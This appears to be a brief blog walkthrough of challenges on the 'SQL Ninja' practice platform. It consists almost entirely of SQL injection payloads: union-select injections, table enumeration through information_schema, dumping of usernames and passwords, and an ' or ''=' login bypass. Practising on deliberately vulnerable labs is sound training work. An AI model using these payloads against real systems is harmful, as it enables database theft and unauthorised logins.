Welcome to pure practical tutorial in which you have to do everything by yourself and if you get into any problem you can take a hint from here. This is only for Knowledge purpose. Don’t use it for malicious things. This contains lessons on SQL Ninja platform.

Challenge 1 for injecting a code
Code used: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1’+union+select+1,’injected by siddhantshcbisd sdjkchsivkjnsv sdkjvbsdkjsd vsdkjvbkjsdvbsd skdjvbkjsdvnsd dskjbvkjdsvns sdkjvbskdjvbsdk kjsdbvkjsdbvkjsd dkjbvkdsjbvccqeb’,3– –

Challenge 2: For injecting a code
Code used: +union+select+1,’u r hacker’,3,4— –

Challenge to find the tables
Code used http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1%20union%20select %201,table_name,3,4%20from%20information_schema.tables%20where %20table_schema=database()–

Challenge to enter in the table
code used: union select * from table_name (userlogs)

Challenge to open the full database
Code used http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.tables

Challenge to get the admin usernames
Code used http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1%27+UNION+SELECT+1,username,3%20from%20users–

Challenge to get admin passwords
code used http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1%27+UNION+SELECT+1,password,@@version%20from%20users–

Final challenge to get admin login

One way is that we can login from the upper username and passwords which we got for admin access.

Username = Username : ‘ or ”=’ password = Password : ‘ or ”=’

I had made images little blur because this is only for the idea and other you have to do it yourself because this is pure practical tutorial.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.